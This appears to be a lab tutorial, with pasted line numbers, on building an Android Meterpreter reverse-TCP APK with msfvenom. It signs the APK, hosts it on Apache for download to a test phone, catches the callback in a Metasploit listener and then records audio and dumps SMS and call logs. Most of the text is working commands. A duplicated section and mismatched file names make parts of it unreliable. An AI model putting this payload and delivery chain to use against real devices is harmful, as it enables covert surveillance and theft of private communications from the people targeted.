Bj58XQXP

11. Creating a malicious APK (Android Package Kit file format):
2
3In Kali, open the terminal and execute the following command to generate the malicious APK:
4
5sudo msfvenom -p android/meterpreter/reverse_tcp LHOST=<your-ip-address, thats the ip address of the Kali Linux> LPORT=4444 R > android.apk
6
7Below is the break down of what the command means
8
9Note: Replace <your-ip-address> with Kali IP address.
10
11An APK file (Android Package Kit file format) is the file format for applications used on the Android
12
13msfvenom: Metasploit Framework tool for generating payloads.
14-p android/meterpreter/reverse_tcp: Specifies Android Meterpreter reverse TCP payload.
15LHOST=<your-ip-address>: Sets the attacker’s IP address for the connection.
16LPORT=4444: Sets the port for the connection.
17R: Specifies raw output format.
18> android.apk: Redirects the output to an APK file named “android.apk”.
19
20Signing the Certificate
21
22Generate a Keystore for the android.apk file:
23
24sudo keytool -genkey -V -keystore key.keystore -alias hacked -keyalg RSA -keysize 2048 -validity 10000
25
26keytool: Java tool for managing cryptographic keys and certificates.
27-genkey: Generates a new key pair and certificate.
28-V: Enables verbose output for more detailed information.
29-keystore key.keystore: Specifies the filename of the keystore file to be created (key.keystore).
30-alias hacked: Sets an alias (identifier) for the key entry in the keystore (hacked).
31-keyalg RSA: Specifies the algorithm to generate the key pair (RSA).
32-keysize 2048: Sets the size of the key (2048 bits).
33validity 10000: Sets the validity period of the key pair in days (10000 days).
34Install Jarsigner tool:
35
36sudo apt-get install openjdk-11-jdk-headless
37
38Jarsigner is a command-line tool used to digitally sign Java Archive (JAR) files, including APK files in the case of Android applications. Signing the APK file is crucial as it ensures the integrity and authenticity of the application. Android devices require properly signed certificates for app installation, and only signed APK files can be installed.
39
40Sign the APK file using Jarsigner:
41
42sudo jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore key.keystore android.apk hacked
43
44Explanation of each part of the command:
45
46-verbose: Prints detailed information about the signing process.
47-sigalg SHA1withRSA: Specifies the signature algorithm. SHA1withRSA is commonly used.
48-digestalg SHA1: Specifies the digest algorithm. SHA1 is commonly used.
49-keystore key.keystore: Specifies the keystore file containing the private key used for signing. Replace key.keystore with the actual filename of your keystore.
50android.apk: Specifies the APK file you want to sign.
51hacked: Specifies the alias of the key within the keystore.
52Make sure to replace key.keystore with the actual filename of your keystore, and ensure that the keystore file is located in the correct directory. Additionally, replace android.apk with the actual filename of the APK you want to sign.
53
54After running this command, you may be prompted to enter the keystore password. If successful, the APK will be signed with the specified keystore.
55
56Verify if the application is signed:
57
58sudo jarsigner -verify -verbose -certs android.apk
59
60Explanation of each part of the command:
61
62-verify: Instructs jarsigner to verify the signature of the JAR file.
63-verbose: Prints detailed information about the verification process.
64-certs: Prints the certificates associated with the APK during verification.
65-keystore key.keystore: Specifies the keystore file containing the public key used for verification. Replace key.keystore with the actual filename of your keystore.
66android.apk: Specifies the APK file you want to verify.
67Make sure to replace key.keystore with the actual filename of your keystore, and ensure that the keystore file is located in the correct directory. After running this command, you should see information about the verification process, including details about the certificates associated with the APK.
68
69If the verification is successful, it indicates that the APK has been signed with the private key corresponding to the public key stored in the specified keystore.
70
71Install Zipalign tool:
72
73sudo apt-get install zipalign
74
75Zipalign is a tool used to optimize the alignment of resources in APK files. It ensures that all uncompressed data starts with a particular alignment relative to the start of the file. This optimization process improves the performance of the APK on Android devices by reducing memory usage.
76
77Install Zipalign tool:
78
79sudo apt-get install zipalign
80
81Zipalign is a tool used to optimize the alignment of resources in APK files. It ensures that all uncompressed data starts with a particular alignment relative to the start of the file. This optimization process improves the performance of the APK on Android devices by reducing memory usage.
82
83Convert the .apk file with zipalign:
84sudo zipalign -v 4 android.apk singed_jar.apk
85
86zipalign: Android tool for optimizing APK files.
87-v: Enables verbose output for more detailed information.
884: Specifies the alignment requirement (4-byte alignment).
89android.apk: Specifies the input APK file to be aligned.
90singed_jar.apk: Specifies the output aligned APK file.
91
92sudo zipalign -v 4 android.apk singed_jar.apk command threw an error below
93zipalign: symbol lookup error: zipalign: undefined symbol: _ZN11zip_archive6WriterD2Ev
94
95The error you’re encountering with zipalign suggests a symbol lookup issue. This issue might be caused by a mismatch between the version of the zipalign tool and the libraries it depends on.
96
97We need to uninstall the zipalign so we can reinstall the right version using the command sudo apt — purge remove zipalign
98
99Then visit this link. I picked the Zipalign under Debian 10 because it matches my kali Linux
100
101I clicked on the first zipalign link under Debian 10, then you can scroll down and go to downloads and copy the link in the download session
102
103Copy the link and access it on kali Linux
104
105After the Zipalign package is downloaded, ensure it is in the current directory, and then execute the following command to initiate the Zipalign package installation process.
106
107sudo apt install ./zipalign_*_amd64.deb
108
109and verify with the command zipalign
110
111Convert the .apk file with zipalign:
112sudo zipalign -v 4 android.apk singed_jar.apk
113
114zipalign: Android tool for optimizing APK files.
115-v: Enables verbose output for more detailed information.
1164: Specifies the alignment requirement (4-byte alignment).
117android.apk: Specifies the input APK file to be aligned.
118singed_jar.apk: Specifies the output aligned APK file.
119
120We are going to start the apache server on kali linux and attach the vulnerability to it so that it can be downloaded in the the android device through its web browser
121
122Use the command service apache2 start to start the web server the use service apache2 status to check and confirm its running
123
124This command sudo cp signed_jar.apk /var/www/html to copy the signed_jar.apk file to the /var/www/html directory. Ensure that the file signed_jar.apk exists in the current directory or provide the correct path to the file if it’s located elsewhere. You can move into the directory to check if the file vulnerability was successfully moved to that directory
125
126Download Mozila Firefox on the Android device on the VMware
127On the browser o
128
129On the browser of the firefox type the ip address of the kali linux and the name of the vulnerable file like this 192.168.xxx.xxx/singed_jar.apk then click allow on the pop up
130
131Click download to download the vulnerability
132
133Click Next
134
135Click Allow
136
137Click Done
138
139Setting up listener on Metasploit on Kali Linux
140Open Metasploit console:
141sudo msfconsole
142Load multi-handler exploit:
143use exploit/multi/handler
144Set up the reverse payload:
145set payload android/meterpreter/reverse_tcp
146Set LHOST and LPORT:
147set LHOST <your-ip-address>
148set LPORT 4444
149Start the listener:
150run
151
152Use the follow commands for meterpreter to get info
153
154sysinfo: Display system information.
155
156check_root: Check if the device is rooted.
157
158record_mic: Record sounds on the victim’s end.
159
160Using the command dump_calllog to retrieve the call log
161Using the command getuid to get the user id
162
163Using the command ps to get running proccesses
164Using the command shell to get into the shell mode
165
166Using the command dump_sms to get the sms sent by the android device
167
168Using the command ifconfig to get network information
169
170Interface 7 shows the ip address of the android devices
171
172This is the end of the exploitation as i was able to get into the android through a vulnerability that was downloaded into the android device because of relaxed security rules. Through the vulnerability i was able to gather so much information from the android device like call log, running proccesses, network information, send sms, capture sms sent and many more.